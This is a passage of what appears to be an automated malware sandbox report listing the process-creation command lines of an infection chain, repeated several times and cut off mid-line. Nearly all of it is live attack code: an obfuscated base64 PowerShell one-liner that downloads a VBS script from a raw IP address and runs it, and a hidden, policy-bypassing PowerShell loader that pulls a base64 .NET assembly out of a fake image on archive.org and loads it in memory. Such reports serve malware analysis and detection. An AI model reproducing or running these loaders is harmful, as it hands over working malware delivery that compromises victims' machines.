bnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes 